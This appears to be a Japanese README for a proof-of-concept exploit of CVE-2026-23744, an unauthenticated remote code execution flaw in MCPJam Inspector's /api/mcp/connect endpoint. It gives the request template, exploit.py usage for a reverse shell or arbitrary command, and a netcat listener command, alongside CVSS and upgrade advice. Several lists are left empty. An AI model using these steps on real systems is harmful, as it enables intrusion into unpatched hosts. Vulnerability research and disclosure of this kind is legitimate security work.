
CVE-2026-23744 の PoC エクスプロイト。MCPJam Inspector の認証不要の RCE 脆弱性です。脆弱な API エンドポイントを介してリバースシェルとコマンド実行を提供します。
CVE-2026-23744 は、MCPJam Inspector ≤ 1.4.2 に影響する重大な未認証リモートコード実行 (RCE) の脆弱性です。この問題は、Inspector がユーザー制御の MCP サーバー設定を受け入れ、適切な認証やセキュリティ制限なしにプロセス実行をトリガーできる管理エンドポイント (/api/mcp/connect) を公開しているために発生します。影響を受けるバージョンは、デフォルトで localhost ではなく 0.0.0.0 (すべてのインターフェース) をリッスンするため、サービスがネットワークからアクセス可能な場合、リモートからの悪用が可能です。
脆弱性は以下のエンドポイントに関連しています:
POST /api/mcp/connect
このエンドポイントは、サーバー設定を含む JSON オブジェクトを受け入れます。例:
{
"serverConfig": {
"command": "<実行可能ファイル>",
"args": ["<引数>"],
"env": {}
},
"serverId": "<識別子>"
}
この提供された設定は、MCPJam Inspector によって新しい MCP サーバープロセスを作成および管理するために使用されます。エンドポイントは十分な認証とセキュリティ制御を欠いているため、攻撃者は Inspector サービスによって実行される任意のプロセス定義を送信できます。
基本的に、この脆弱性は重要な機能に対する認証欠如 (CWE-306) の問題であり、信頼されたローカルユーザー向けの機能をネットワーク経由でアクセス可能にし、適切なセキュリティチェックなしに公開しています。
脆弱性は2つの設計上の欠陥から生じています:
0.0.0.0 をリッスンします。結果として生じる攻撃経路は次のように視覚化できます:
攻撃者 → /api/mcp/connect → プロセス作成 → オペレーティングシステム
アプリケーションはオペレーティングシステムのプロセス作成と直接やり取りするため、悪用に成功すると、MCPJam Inspector サービスのセキュリティコンテキスト内で任意のコマンド実行が発生する可能性があります。
python3 exploit.py -t <ターゲットURL> -tport <ターゲットポート> -lhost <ローカルIP> -lport <ポート>
-t (または) --target: ターゲットURLまたはターゲットIPアドレス。-tport (または) --target-port: 接続先のターゲットポート。ほとんどの場合 MCPJam Inspector では 6274 です。MCPJam Inspector がサブドメインや仮想ホストなど別の場所でホストされている場合は、この引数を使用しないでください。代わりに -t 引数を使用してサブドメインまたは仮想ホストを指定してください。-lhost (または) --local-host: リバースシェルが接続を戻すためのパブリックIPアドレス。-lport (または) --local-port: リバースシェルに使用するポート。python3 exploit.py -t <ターゲットURL> -tport <ターゲットポート> -lhost <ローカルIP> -lport <ポート> -c '<コマンド>'
-c (または) --command: ターゲット上で実行するコマンド。このプログラムを使用する前に、まずローカルマシンで Netcat を使用してリスナーを起動する必要があります。
これを行うには、次のコマンドを使用します:
nc -lvnp <ポート>
次に、上記のコマンドを実行してターゲット上でリバースシェルを取得します。
悪用に成功すると、攻撃者は以下を行う可能性があります:
この脆弱性は、ネットワークベースの攻撃ベクトル、認証の欠如、ユーザー操作の不在、および機密性、完全性、可用性への高い影響により、CVSS v3.1 スコア 9.8 (Critical) が割り当てられています。
直ちに MCPJam Inspector 1.4.3 以降にアップグレードしてください。追加の防御策は以下の通りです:
この PoC は、教育、防御的なセキュリティ研究、および許可されたセキュリティテストのためのみです。明示的な許可を得たシステムに対してのみ使用する必要があります。許可なく第三者システムに対して使用すると、該当する法律や規制に違反する可能性があります。このリポジトリの所有者は、このプログラムの使用によって生じたいかなる損害についても責任を負いません。